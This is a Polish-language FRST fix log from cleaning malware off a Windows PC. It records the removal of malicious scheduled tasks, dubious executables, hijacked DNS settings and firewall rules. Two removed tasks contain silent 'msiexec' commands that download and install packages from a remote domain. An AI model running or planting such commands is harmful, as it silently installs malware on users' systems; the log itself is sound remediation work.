Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 3-07-2019 Uruchomiony przez Admin (09-07-2019 11:07:25) Run:1 Uruchomiony z C:\Users\Admin\Desktop Załadowane profile: Admin (Dostępne profile: Admin) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: EmptyTemp: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {d28d5708-70a2-11e9-8253-54e1ad37d8c9} - "G:\HiSuiteDownLoader.exe" HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {ebcb9655-4114-11e9-8249-54e1ad37d8c9} - "E:\HiSuiteDownLoader.exe" Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.me vpn.lnk [2018-06-10] ShortcutTarget: hide.me vpn.lnk -> (Brak pliku) GroupPolicy: Ograniczenia ? <==== UWAGA GroupPolicy\User: Ograniczenia ? <==== UWAGA Task: {02D0BE1F-6DA9-40A6-884A-0117C668FBDB} - System32\Tasks\Opera scheduled Autoupdate 1555496896 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [1519640 2019-07-03] (Opera Software AS -> Opera Software) Task: {2DC9C70D-5375-48D3-9C03-2BF318A3D057} - System32\Tasks\{4F04615B-4F86-A938-1472-6495690C244B} => C:\Program Files\Opera\Launcher.exe Task: {2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB} - System32\Tasks\atuspirahjizy => "msiexec" /q -package hxxps://guardname.net/ireojlqn.vao <==== UWAGA Task: {3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51} - System32\Tasks\uaieoe => "msiexec" -package hxxps://guardname.net/lnopgvliuepry.ito /q <==== UWAGA Task: {631A661E-E721-48C3-85B4-9F44BEE0D0B4} - System32\Tasks\GoogleCheckService => C:\Users\Admin\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe <==== UWAGA Task: {64C1418E-014A-4557-A68D-DB9F826005F9} - System32\Tasks\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0} => C:\Users\Admin\YYiiRubU.exe Task: {AC22B376-CEAA-4841-98CB-FCBA3BD21B8F} - System32\Tasks\{987801ED-4C56-F6FF-CA13-E3A13116E3CD} => C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe [59904 
2018-04-12] (Microsoft Windows -> Microsoft Corporation) <==== UWAGA Tcpip\..\Interfaces\{00664684-73f1-4cba-aa09-d11d6f3938c9}: [NameServer] 208.67.222.222 208.67.220.220 Tcpip\..\Interfaces\{1f5df075-51bc-4453-827f-885c1e62f828}: [NameServer] 208.67.222.222 208.67.220.220 Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [NameServer] 8.8.8.8 Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [NameServer] 95.216.188.196,185.4.64.13,185.162.128.148,208.67.222.222,208.67.220.220 Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [DhcpNameServer] 150.204.1.2 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> DefaultScope {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL = SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL = Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - Brak pliku CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx 2019-01-13 20:52 - 2019-03-23 14:00 - 006387208 _____ () C:\Users\Admin\AppData\Local\dump007.dat 2018-04-12 01:34 - 2018-04-12 01:34 - 000059904 ____N (Microsoft Corporation) 
C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe 2018-08-18 15:51 - 2018-08-18 15:51 - 000000002 _____ () C:\Users\Admin\AppData\Local\imw.ini 2018-09-27 15:25 - 2018-04-12 01:34 - 001626536 _____ (Microsoft Corporation) C:\Users\Admin\AppData\Local\user32.dll ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:3or4kl4x13tuuug3Byamue2s4b [87] AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] FirewallRules: [{A6A5C7A9-027C-4F42-B541-F2D562CDB229}] => (Allow) LPort=8318 FirewallRules: [{03E16E48-3B2F-4299-9D9B-C178D808E40D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{CF48F6C4-858E-4E73-A933-A71F1F6F4FEE}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{64D280BB-BC56-4A29-8095-97627A02F28D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{B4E0157D-362D-4F31-93FB-A738B532D361}] => (Allow) C:\WINDOWS\SysWOW64\EdCFORXI.exe (Microsoft Corporation) [Brak podpisu cyfrowego] FirewallRules: [{37142FAD-4D3C-4991-8CCD-54E2A556D162}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{5B4E7D8A-B6FF-4219-A7B8-84BDA65D21C7}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0ECE455A-0DF1-4529-85A9-B356C51AB0AB}] => (Allow) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{ACD8B314-E01F-476A-AA61-D6C350FEB771}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{F0E66E77-806F-4A19-84BA-1EEBF76D4704}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: 
[{E18CB599-659E-4288-855B-035B26940DCD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{72830BD2-1A95-43F3-BF8F-804003820D45}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{3DF174C1-ABB4-4BD0-A38F-880CB104A5A5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D8FCF870-ED67-414A-A813-2786CF4A03B0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{917D6863-D5F5-4FC0-B1B6-F142306DE630}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{5AA4C11C-BFF9-4D8A-ACD9-462B7A1558DC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D21E1A99-3F8B-488B-9092-43E05A791718}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{75C2FF55-35B8-4BBE-8A80-70A97CFDD3B9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{2AC51EDF-E7AF-4A15-85B3-E36EF0FD0A06}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{47260107-8610-4B2D-86D8-A482C109EE1A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{6D0E8727-8D15-4B68-96E0-B760C23F4897}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{115C1C19-86D9-4C46-B6A7-06865E5A617D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{0A851A54-5ADF-45A8-A289-169AF0E4AAA0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) 
FirewallRules: [{C7E30ACE-DABD-4219-AAF4-53E3192A3488}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{382BAA1D-2454-4607-AFF9-2013F9C517A5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{E4A66AE3-F9DD-442C-9DB4-1DC8450A9101}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{9C72FBB1-9B02-4D58-B759-EB46EE0FA165}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{2EB3AE89-1765-4A40-8C2E-AC80BB26DD7E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{05458F64-71B7-4D7B-B787-50DEF3E7DC17}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{66422008-3EAC-430D-A4F3-E8789E4EBFEA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{528EC959-68F4-4299-B77A-51BD0FFAB752}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{D24C728C-7AF4-4667-9C60-4AE4BFFDC5BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{824589D8-984E-4791-9AA2-0AF6AB96114D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{BC439E86-3C2D-487D-90CD-A8027DCD0163}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{FA7E57DE-46E9-44CC-90A1-C12FD2953734}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{B27242ED-E50E-4991-BEF1-5D36B6767A8A}] => (Allow) 
C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{CCB36B66-169F-48AE-8335-FB65681580C3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{B2F714ED-70E7-4302-9A1E-317DCD60FD3E}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{EB151E14-9252-43D5-B5D7-95CB5A99BAE1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{90358491-0F7E-4902-9E7A-387A36921D8B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{BD26266C-9665-49F5-BB53-9A6D5F1440E1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{15BBFBDA-FC59-4850-BE98-96D862905272}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{183568B8-EC84-4799-A0A0-6118469003BD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{9C431AB2-41D6-4B90-AF9C-28373F77D83D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{F04F5A38-DC16-414D-B0AD-BD65FD675285}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{17146151-E038-482B-ABBF-1C65287CF97D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{0C886FE7-BC52-4F4B-BF80-48350FF7DFC9}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{47A422BE-ADBB-49AD-A26C-F9F2785101BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) 
FirewallRules: [{A3AD3CFA-F373-40E5-818A-DF60D217637B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{45F871DF-A008-4433-8F52-589FA43D706C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{CC4D3F11-73B5-46C4-AD72-AA8D5A30541B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{408F5652-536C-47D8-A149-D9DEE0526756}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{C9334AA3-9765-4478-A9D6-8F714A7223DF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{71E63A59-3089-4274-9D33-3AD38A2BD5B6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{79F00C57-D74A-4787-9048-855974AD2632}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{4AB41BFF-B4BB-470B-9E3C-1D67658152A6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{E6ADA24F-2F38-4030-BBB1-5F90E4D39666}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{4BEBC431-FB63-4CBF-A456-4ED8E79F2154}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{4C098975-9938-4F0D-BB32-725DC1EA1DC4}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) Hosts: RemoveProxy: CMD: netsh int ip reset CMD: ipconfig /flushdns FilesInDirectory: C:\Users\Admin\AppData\Local\*.exe;*.dll;*.ini FilesInDirectory: C:\Users\Admin\*.exe;*.dll;*.ini ***************** Procesy zostały pomyślnie zamknięte. 
Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d28d5708-70a2-11e9-8253-54e1ad37d8c9} => pomyślnie usunięto HKLM\Software\Classes\CLSID\{d28d5708-70a2-11e9-8253-54e1ad37d8c9} => nie znaleziono HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcb9655-4114-11e9-8249-54e1ad37d8c9} => pomyślnie usunięto HKLM\Software\Classes\CLSID\{ebcb9655-4114-11e9-8249-54e1ad37d8c9} => nie znaleziono C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.me vpn.lnk => pomyślnie przeniesiono "ShortcutTarget: hide.me vpn.lnk -> (Brak pliku)" => nie znaleziono C:\WINDOWS\system32\GroupPolicy\Machine => pomyślnie przeniesiono C:\WINDOWS\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => pomyślnie przeniesiono C:\WINDOWS\system32\GroupPolicy\User => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{02D0BE1F-6DA9-40A6-884A-0117C668FBDB}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{02D0BE1F-6DA9-40A6-884A-0117C668FBDB}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1555496896 => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 1555496896" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2DC9C70D-5375-48D3-9C03-2BF318A3D057}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2DC9C70D-5375-48D3-9C03-2BF318A3D057}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\{4F04615B-4F86-A938-1472-6495690C244B} => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Tree\{4F04615B-4F86-A938-1472-6495690C244B}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\atuspirahjizy => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\atuspirahjizy" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\uaieoe => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\uaieoe" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{631A661E-E721-48C3-85B4-9F44BEE0D0B4}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{631A661E-E721-48C3-85B4-9F44BEE0D0B4}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\GoogleCheckService => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleCheckService" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{64C1418E-014A-4557-A68D-DB9F826005F9}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{64C1418E-014A-4557-A68D-DB9F826005F9}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0} => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Plain\{AC22B376-CEAA-4841-98CB-FCBA3BD21B8F}" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AC22B376-CEAA-4841-98CB-FCBA3BD21B8F}" => pomyślnie usunięto C:\WINDOWS\System32\Tasks\{987801ED-4C56-F6FF-CA13-E3A13116E3CD} => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{987801ED-4C56-F6FF-CA13-E3A13116E3CD}" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{00664684-73f1-4cba-aa09-d11d6f3938c9}\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1f5df075-51bc-4453-827f-885c1e62f828}\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}\\DhcpNameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}\\DhcpNameServer" => pomyślnie usunięto HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono "HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main\\Secondary Start Pages" => pomyślnie usunięto 
"HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0A2E1844-0585-446D-B39E-4DD1FED6B322} => pomyślnie usunięto HKLM\Software\Classes\CLSID\{0A2E1844-0585-446D-B39E-4DD1FED6B322} => nie znaleziono HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => nie znaleziono HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto C:\Users\Admin\AppData\Local\dump007.dat => pomyślnie przeniesiono C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe => pomyślnie przeniesiono C:\Users\Admin\AppData\Local\imw.ini => pomyślnie przeniesiono C:\Users\Admin\AppData\Local\user32.dll => pomyślnie przeniesiono HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono C:\Users\Admin\Desktop\Tobiasz.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS pomyślnie usunięto C:\Users\Admin\Desktop\Tobiasz.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A6A5C7A9-027C-4F42-B541-F2D562CDB229}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{03E16E48-3B2F-4299-9D9B-C178D808E40D}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CF48F6C4-858E-4E73-A933-A71F1F6F4FEE}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64D280BB-BC56-4A29-8095-97627A02F28D}" => 
pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B4E0157D-362D-4F31-93FB-A738B532D361}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{37142FAD-4D3C-4991-8CCD-54E2A556D162}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5B4E7D8A-B6FF-4219-A7B8-84BDA65D21C7}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0ECE455A-0DF1-4529-85A9-B356C51AB0AB}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ACD8B314-E01F-476A-AA61-D6C350FEB771}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F0E66E77-806F-4A19-84BA-1EEBF76D4704}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E18CB599-659E-4288-855B-035B26940DCD}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{72830BD2-1A95-43F3-BF8F-804003820D45}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3DF174C1-ABB4-4BD0-A38F-880CB104A5A5}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D8FCF870-ED67-414A-A813-2786CF4A03B0}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{917D6863-D5F5-4FC0-B1B6-F142306DE630}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5AA4C11C-BFF9-4D8A-ACD9-462B7A1558DC}" => pomyślnie usunięto 
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D21E1A99-3F8B-488B-9092-43E05A791718}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{75C2FF55-35B8-4BBE-8A80-70A97CFDD3B9}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2AC51EDF-E7AF-4A15-85B3-E36EF0FD0A06}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{47260107-8610-4B2D-86D8-A482C109EE1A}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6D0E8727-8D15-4B68-96E0-B760C23F4897}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{115C1C19-86D9-4C46-B6A7-06865E5A617D}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A851A54-5ADF-45A8-A289-169AF0E4AAA0}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C7E30ACE-DABD-4219-AAF4-53E3192A3488}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{382BAA1D-2454-4607-AFF9-2013F9C517A5}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E4A66AE3-F9DD-442C-9DB4-1DC8450A9101}" => pomyślnie usunięto 